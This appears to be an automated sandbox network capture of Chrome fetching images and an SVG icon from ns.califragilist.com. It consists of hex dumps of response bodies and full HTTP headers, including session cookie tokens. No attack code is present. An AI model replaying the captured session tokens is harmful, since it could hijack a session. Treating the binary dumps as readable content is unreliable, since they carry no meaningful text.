                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 f7 02 00 00 01 0f 30 ff 11 11 82 6e b3 6d 75 04 eb 47 04 84 74 30 34 32 1a b7 b5 97 91 40 da c6 e8 60 5b a0 04 b2 25 b0 fc 05 36 18 f3 99 d9 cb 39 41 44 ff 27 40 fe 2c 66 cf b6 42 91 01 86 2b 00 96 2b 02 8e 2b 01 0b 57 26 db 70 b8 d0 c1 d0 a0 ea 68 ac ac 07 10
                                                                                                                                              Data Ascii: XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH0nmuGt042@`[%69AD'@,fB+++W&ph
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: a4 43 7f fa 96 d2 fc 1e a9 83 1d 98 3b ff d5 ec 64 6c 59 9a f0 03 d6 a5 4f 38 4e ec 3a 68 37 d3 07 fb 1f 84 dd 2f 8d c4 96 b3 84 dd 1e f9 3a 16 77 91 b1 ba 12 d0 75 12 2b a1 1c 4c b4 b5 ef d5 2e 35 28 73 57 9a 39 e9 98 64 58 e9 d0 b4 7b e8 16 21 56 f2 7a 79 75 96 46 6d ff f8 fd 8e 47 59 1e 51 75 fa 4f 1c f4 c0 2b 50 0d c7 38 64 77 5c 56 a5 36 ed b8 72 b8 da 1e 0e 0a 69 82 90 3b 33 be ae 6c f6 56 ae 05 a3 38 1d 8c d7 88 56 f9 80 6c 09 bd 3c 43 e9 8d ed 68 6b be 0e a3 c5 6a 53 7a fc 05 18 5f ac 03 2a 1b 77 43 cf e8 fb a2 b4 a2 f0 8e 71 6d 71 27 f8 cb 31 bb 4a bb 26 91 99 75 2b 90 dd d8 0d 1d 44 ab 0d ce 1a cd 88 75 03 8c 1b a0 f4 ce 87 95 9c ae fc 60 9d ec d2 13 50 73 5d 45 cb 99 9e 74 68 a2 ba ba 9a ef 3f 49 aa b8 3a 89 2f 67 c1 f9 04 19 d5 d1 b9 ce ee b8
                                                                                                                                              Data Ascii: C;dlYO8N:h7/:wu+L.5(sW9dX{!VzyuFmGYQuO+P8dw\V6ri;3lV8Vl<ChkjSz_*wCqmq'1J&u+Du`Ps]Eth?I:/g
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 75 de 65 0f 38 5a 84 ae 02 51 db 09 ec 89 38 1e 98 43 cf 50 89 af 52 0d 45 89 6b 6b e5 cc 10 46 c7 86 d2 c0 50 f6 84 50 22 53 b0 b1 7d bf b9 ae 5e af 53 74 d8 04 f6 f9 68 ab b4 1b 06 c3 76 71 2d 6f 23 97 f3 73 1a 6a 3a 34 ed 64 31 3e bc cd 97 3c bf cd c3 35 b7 ee 21 9e 0e cb 60 1c 13 f6 47 8d d4 74 4e e0 42 d6 40 a4 4e af 30 f4 de b7 ac 74 6a e8 f4 a2 03 93 cd 92 0a ec 6d 09 b2 b7 8e a9 35 a1 a0 c3 75 bf b5 81 16 c7 f1 b1 d4 5d 3d 72 a4 be db b5 16 f7 dc 35 7e 55 7e c7 67 09 3c 8b e3 3b f8 a6 de 44 25 d1 d6 bb c3 38 29 fe eb ff 1a c7 ce 96 52 00 cb 29 c3 5e 1f 11 ef 1e ec a4 9e 8e c8 24 65 3f 8e 83 66 fe e9 b9 99 ad f8 c1 8b f1 dc 15 ca 57 a5 52 ef e0 00 0a ed 07 98 dd 12 ab 50 c7 63 d5 2c 27 c3 71 aa 86 f6 75 24 50 bf 8e c5 4d 96 ef cc 78 d4 be 99 94 4e
                                                                                                                                              Data Ascii: ue8ZQ8CPREkkFPP"S}^Sthvq-o#sj:4d1><5!`GtNB@N0tjm5u]=r5~U~g<;D%8)R)^$e?fWRPc,'qu$PMxN
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 8d 49 38 5e b6 f0 af f8 b9 89 d6 f9 39 7d db ff ff c9 c1 ff f9 31 af ff f2 51 90 17 19 60 64 27 48 af 92 6b 57 59 68 96 10 7c 31 1e 74 e0 c0 e7 05 7b a2 b6 7e 70 27 82 e1 95 48 90 95 36 78 69 35 18 77 d4 8a 58 b7 d6 1e 8d 3d 07 d3 c4 f8 e3 ec e1 75 56 e1 b2 fd a3 56 b3 e0 ec ce 05 db 3e 96 80 d4 53 cf b1 f6 cf 43 88 fa ec 92 d2 4d 3d 83 cb de 8b 41 88 2e ec 4a 6c be 90 50 59 31 be 1b a5 22 95 36 76 11 da e5 9f d3 0b a5 ba 6d bd 03 6e 27 7d 7f bc 3e 2e a2 7d 38 75 67 b4 59 c4 69 e7 c4 e7 41 c2 08 5b c8 41 ba b8 a2 1e 09 93 8e 9e fd ea 07 be 14 ff 13 47 e8 71 18 0a 03 d3 4b 96 0e f1 fe 47 29 00 4d 09 85 0d b5 cb 4f f7 95 f4 37 24 fd a4 f6 ce cd 00 77 59 74 0f 9f 27 84 10 0b e1 a0 fd 2f 7b 8e 9f de 91 ff 6b c9 0d 80 ae 94 98 95 99 39 41 2e ab 36 5e c6 50 1a
                                                                                                                                              Data Ascii: I8^9}1Q`d'HkWYh|1t{~p'H6xi5wX=uVV>SCM=A.JlPY1"6vmn'}>.}8ugYiA[AGqKG)MO7$wYt'/{k9A.6^P
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 4e 89 20 3f 30 e1 97 38 b7 df b7 fc f8 6a 1e d0 6f 33 7d eb dc 1d 0c 0f 5b 85 66 dd 7b 62 68 03 df 43 73 08 8b 62 ae 56 56 80 af ff e4 eb 17 e9 85 6a 29 24 00 82 b7 11 17 09 0a ad 78 a4 63 80 f4 4f 58 cc 42 bd f1 85 3e 17 9d ba 4b a6 e2 ad 8e 77 1a c0 59 af 8b ae cb 6e 34 54 5d a6 1b 59 90 bf 71 df 7f aa 30 6a 46 6a b8 00 dc e4 d5 03 4e a0 92 26 32 58 b8 d2 0e b1 2c 8a 0a 02 41 e3 14 15 61 f0 79 07 70 c5 a5 c1 69 98 91 36 05 a7 39 88 36 2b 41 4e a0 e1 a8 8d 32 ae dd bf bd e4 40 d7 68 4c 5b 2d 09 00 df d1 8a af ad ad f8 87 e8 6a d3 4d 3a c1 c5 df af b1 1a cb 6f f2 75 41 d8 77 98 66 c3 3f 01 d9 24 9e 2b 91 2c f1 58 5f f3 05 80 6f 0e e0 e6 df 4d 56 68 75 04 7c 61 9b 75 f8 94 a7 45 ec 60 97 2d ea 0f ad 5d 53 02 7c 34 13 79 11 49 eb ed 73 3f cd 1b 52 1e c2 3c
                                                                                                                                              Data Ascii: N ?08jo3}[f{bhCsbVVj)$xcOXB>KwYn4T]Yq0jFjN&2X,Aaypi696+AN2@hL[-jM:ouAwf?$+,X_oMVhu|auE`-]S|4yIs?R<
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 8f 6d 17 d7 fc 27 b9 c9 c7 3f bf e6 8a 2b 52 63 c7 f3 be 1a 36 2f 61 1c a5 70 03 c0 f8 e3 73 c8 0b 73 4c ed 9b ef da 31 4a ad f7 62 90 0d f7 d9 36 39 cc f9 64 80 e6 fa ef 79 d1 7a 95 ab a4 48 59 7d b5 9d 91 de ef 0c f2 4b 81 57 4f a7 7e 4e ee bd bb 1e bb d8 27 da 1b a2 15 6a 4d 2f 12 f6 35 d2 d1 4e 0b 5d fc e2 ec 02 21 c7 77 dd 0f e0 3f 65 e9 64 ef d4 d5 e0 b9 92 fd e8 0a 11 88 73 76 5b 4f 67 e6 fb e2 ef 9b 47 05 04 1e a4 30 91 04 9f 08 c2 7b 5e 0a 24 ef b0 d4 0a 27 35 4b 56 14 f8 e7 a3 94 90 36 91 b8 ef 1b 45 49 99 17 bf ce 20 3e 60 3c 7c 60 21 df 65 7b 3f 6b b9 01 f8 7f dc 63 80 8f 21 d2 23 ae dd 7f 9d 62 35 30 f3 7d dc 46 ee 5c 25 2d 0a f3 1f d2 eb 5e b7 d1 51 64 c3 98 0a 99 8a a0 2c 28 09 7c 30 ba bf 48 8f e9 26 58 55 ff 7c 10 56 b3 a3 5b 86 4f 58 99
                                                                                                                                              Data Ascii: m'?+Rc6/apssL1Jb69dyzHY}KWO~N'jM/5N]!w?edsv[OgG0{^$'5KV6EI >`<|`!e{?kc!#b50}F\%-^Qd,(|0H&XU|V[OX
                                                                                                                                              2024-11-06 15:56:05 UTC1104INData Raw: 75 7f c2 35 33 18 84 28 60 e8 68 a5 b5 da f0 dc 63 f3 4a 11 e5 f6 ff d0 f4 5a a2 8e 8c 2e aa 69 b7 d4 0a 7c 5b 26 34 eb e6 71 e7 31 4b 35 81 80 e9 67 9a bb d5 1c 7a 47 5b 22 f2 29 7e 24 06 e6 ac 02 34 5d 3e 6b f3 be 70 35 a8 90 8d c4 9a fc a1 46 f7 e2 46 50 0f 00 fc 8b 54 f1 9d da e0 96 2d 38 99 a3 c1 f0 3c 39 b6 1d 07 09 f0 a6 ce a5 c8 f8 ad b9 23 6c 29 92 be bf 77 2b 9b 40 67 08 e7 23 3a e0 4d 2b d7 4c a6 2f 8d ef 42 72 f0 7c 26 12 b0 90 a3 81 6a 7e 60 fc 6d f4 65 8f 18 b7 9a fe 0d d5 34 75 21 75 53 03 90 17 f5 fa 85 80 a4 2f 51 ff e1 21 33 80 11 99 9f ed 80 a6 c3 98 5f 3c 1f ff e0 ed 55 f3 00 c6 7a ce 21 00 33 2e 74 d2 91 1d 5d 3f a5 53 32 ad 6c c5 7c e0 e3 07 04 10 fd 7e b0 7a 35 b7 83 14 99 23 72 ab 96 98 26 c0 bd 3a 41 8f e9 ee b7 ae a1 32 0d 5d 64
                                                                                                                                              Data Ascii: u53(`hcJZ.i|[&4q1K5gzG[")~$4]>kp5FFPT-8<9#l)w+@g#:M+L/Br|&j~`me4u!uS/Q!3_<Uz!3.t]?S2l|~z5#r&:A2]d


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              89192.168.2.1849877188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:05 UTC1118OUTGET /ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:05 UTC1057INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2KWWnknO1uJpTHrBZ4%2FJnDpJHp%2BbDy5K1shmkY1WRDn2IP6VbLUpx4G6BQuo7mVvkJmKw3zsZNRjHmr%2Fctyuf%2Fb7PLRXzIvPJVh9t8EuYny09NjVGVOJ%2BqU0ydN9Cw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3472&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2039&delivery_rate=781646&cwnd=251&unsent_bytes=0&cid=0781ca9a18eeaa86&ts=82&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64585d89e6b05-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1696&delivery_rate=2901803&cwnd=251&unsent_bytes=0&cid=1895c1396fd4f3f2&ts=475&x=0"
                                                                                                                                              2024-11-06 15:56:05 UTC312INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                                                                                              Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 30 30 31 39 20 32 30 2e 39 36 38 20 34 2e 35 30 30 34 31 20 32 30 2e 39 39 34 39 20 34 2e 35 30 30 36 36 20 32 31 2e 30 32 31 38 43 34 2e 35 30 30 32 32 20 32 31 2e 30 35 37 34 20 34 2e 35 20 32 31 2e 30 39 33 20 34 2e 35 20 32 31 2e 31 32 38 37 43 34 2e 35 35 30 32 31 20 32 38 2e 32 36 30 39 20 36 2e 38 30 39 36 37 20 33 39 2e 31 36 30 31 20 31 38 2e 36 30 39 31 20 34 36 2e 34 39 33 32 43 32 31 2e 38 32 32 35 20 34 38 2e 35 30 32 33 20 32 35 2e 38 38 39 36 20 34 38 2e 35 30 32 33 20 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 43 34 31 2e 30 35 33 20 33 39 2e 32 31 30 33 20 34 33 2e 33 31 32 35 20 32 38 2e 33 31 31 31 20 34 33 2e 33 31 32 35 20 32 31 2e 31 32 38 37 43 34 33 2e 33 31 32 35 20 32 31 2e 31 30 38 20 34 33 2e 33 31 32 34 20 32 31 2e 30 38 37
                                                                                                                                              Data Ascii: 0019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.087
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 39 31 20 34 36 2e 34 39 33 32 43 32 31 2e 38 32 32 35 20 34 38 2e 35 30 32 33 20 32 35 2e 38 38 39 36 20 34 38 2e 35 30 32 33 20 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 43 34 31 2e 30 35 33 20 33 39 2e 32 31 30 33 20 34 33 2e 33 31 32 35 20 32 38 2e 33 31 31 31 20 34 33 2e 33 31 32 35 20 32 31 2e 31 32 38 37 43 34 33 2e 33 31 32 35 20 32 31 2e 31 30 38 20 34 33 2e 33 31 32 34 20 32 31 2e 30 38 37 32 20 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 43 34 33 2e 33 31 32 34 20 32 31 2e 30 32 34 36 20 34 33 2e 33 31 32 35 20 32 30 2e 39 38 32 39 20 34 33 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 34 33 2e 33 31 32 35 20 31 37 2e 33 33 37 31 20 34 31 2e 30 30 35 35 20 31 34 2e 31 39 34 36 20 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 43 33 37 2e 30 36 30
                                                                                                                                              Data Ascii: 91 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.060
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 30 35 36 33 20 34 33 2e 30 38 36 39 4c 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 5a 4d 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 4c 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 33 39 2e 33 31 32 32 20 32 31 2e 30 37 33 39 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 4c 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 5a 4d 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 4c 33 33 2e 36 38 32 34 20 31 33 2e 33 37 33 38 4c 33 33 2e 38 38 38 20 31 36 2e 30 30 31 36 4c 33 36 2e 33 38 33 38 20 31 36 2e 38 34 39 33 4c 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 4c 38 2e 36 30 36 36 20 33 36 2e 37 38 36 36 4c 37 2e 35 36 32 37 37 20 33 39 2e 30 33 37 34 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 4c 31 32
                                                                                                                                              Data Ascii: 0563 43.0869L29.1532 46.4932ZM43.3123 21.0665L39.3123 21.0519L39.3122 21.0739L39.3124 21.096L43.3123 21.0665ZM37.6702 13.0618L33.6824 13.3738L33.888 16.0016L36.3838 16.8493L37.6702 13.0618ZM12.2354 38.4694L8.6066 36.7866L7.56277 39.0374L9.11539 40.9726L12
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 31 2e 30 37 36 35 20 30 2e 35 20 32 31 2e 31 32 38 37 48 38 2e 35 5a 4d 32 30 2e 37 32 30 35 20 34 33 2e 30 39 35 38 43 31 30 2e 35 30 30 35 20 33 36 2e 37 34 34 33 20 38 2e 35 34 34 34 36 20 32 37 2e 34 33 30 32 20 38 2e 34 39 39 39 20 32 31 2e 31 30 30 36 4c 30 2e 35 30 30 30 39 39 20 32 31 2e 31 35 36 39 43 30 2e 35 35 35 39 35 39 20 32 39 2e 30 39 31 36 20 33 2e 31 31 38 38 37 20 34 31 2e 35 37 35 39 20 31 36 2e 34 39 37 37 20 34 39 2e 38 39 30 36 4c 32 30 2e 37 32 30 35 20 34 33 2e 30 39 35 38 5a 4d 32 37 2e 30 35 36 33 20 34 33 2e 30 38 36 39 43 32 35 2e 30 36 38 34 20 34 34 2e 33 31 30 36 20 32 32 2e 36 33 35 38 20 34 34 2e 32 39 33 33 20 32 30 2e 37 32 39 36 20 34 33 2e 31 30 31 35 4c 31 36 2e 34 38 38 36 20 34 39 2e 38 38 34 39 43 32 31 2e 30 30
                                                                                                                                              Data Ascii: 1.0765 0.5 21.1287H8.5ZM20.7205 43.0958C10.5005 36.7443 8.54446 27.4302 8.4999 21.1006L0.500099 21.1569C0.555959 29.0916 3.11887 41.5759 16.4977 49.8906L20.7205 43.0958ZM27.0563 43.0869C25.0684 44.3106 22.6358 44.2933 20.7296 43.1015L16.4886 49.8849C21.00
                                                                                                                                              2024-11-06 15:56:05 UTC1369INData Raw: 38 2e 33 30 35 37 5a 4d 33 30 2e 32 36 30 37 20 34 38 2e 33 30 36 38 4c 33 30 2e 32 36 32 38 20 34 38 2e 33 30 35 35 4c 32 36 2e 30 38 36 31 20 34 31 2e 34 38 32 34 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 33 30 2e 32 36 30 37 20 34 38 2e 33 30 36 38 5a 4d 33 30 2e 32 36 36 20 34 38 2e 33 30 33 35 4c 33 30 2e 32 36 38 31 20 34 38 2e 33 30 32 33 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 33 30 2e 32 36 36 20 34 38 2e 33 30 33 35 5a 4d 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 43 32 31 2e 33 38 39 39 20 35 30 2e 37 33 37 39 20 32 36 2e 33 32 35 32 20 35 30 2e 37 32 39 34 20 33 30 2e 32 36 37 32 20 34 38 2e 33 30 32 38 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 43 32 34 2e 36 38 34 31 20 34
                                                                                                                                              Data Ascii: 8.3057ZM30.2607 48.3068L30.2628 48.3055L26.0861 41.4824L26.084 41.4836L30.2607 48.3068ZM30.266 48.3035L30.2681 48.3023L26.0767 41.4881L26.0746 41.4894L30.266 48.3035ZM17.4826 48.295C21.3899 50.7379 26.3252 50.7294 30.2672 48.3028L26.0734 41.4902C24.6841 4
                                                                                                                                              2024-11-06 15:56:05 UTC241INData Raw: 31 39 2e 38 32 39 36 20 32 34 2e 30 38 39 31 20 31 39 2e 38 32 39 36 56 31 31 2e 38 32 39 36 5a 4d 33 34 2e 36 31 38 38 20 32 32 2e 33 35 39 33 43 33 34 2e 36 31 38 38 20 31 36 2e 35 34 33 39 20 32 39 2e 39 30 34 35 20 31 31 2e 38 32 39 36 20 32 34 2e 30 38 39 31 20 31 31 2e 38 32 39 36 56 31 39 2e 38 32 39 36 43 32 35 2e 34 38 36 32 20 31 39 2e 38 32 39 36 20 32 36 2e 36 31 38 38 20 32 30 2e 39 36 32 32 20 32 36 2e 36 31 38 38 20 32 32 2e 33 35 39 33 48 33 34 2e 36 31 38 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 30 30 30 30 22 20 6d 61 73 6b 3d 22 75 72 6c 28 23 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 29 22 2f 3e 0d 0a 3c 2f 73 76 67 3e 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 19.8296 24.0891 19.8296V11.8296ZM34.6188 22.3593C34.6188 16.5439 29.9045 11.8296 24.0891 11.8296V19.8296C25.4862 19.8296 26.6188 20.9622 26.6188 22.3593H34.6188Z" fill="#000000" mask="url(#07b26034-56a3-49d2-8f26-c7b84eb4eed4)"/></svg>
                                                                                                                                              2024-11-06 15:56:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              90192.168.2.1849878188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:05 UTC1379OUTGET /uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:05 UTC1032INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 17842
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1I7K6H6JXNhAUSYo9fQ55b1nq1Bh9dheQpYfRts953EnyYOnkUFZO2EYtmOXKGfzrzKY6dhOgRX16LUnV5j3SrCAgiNe0GWHSQjdrMKibUtxyzDX68KyGpHBudXWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3384&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2301&delivery_rate=846536&cwnd=251&unsent_bytes=0&cid=a900af69d7b79f78&ts=139&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de645865b2ee5ca-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1438&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1957&delivery_rate=2126284&cwnd=251&unsent_bytes=0&cid=d8e0b5d68a360bd3&ts=533&x=0"
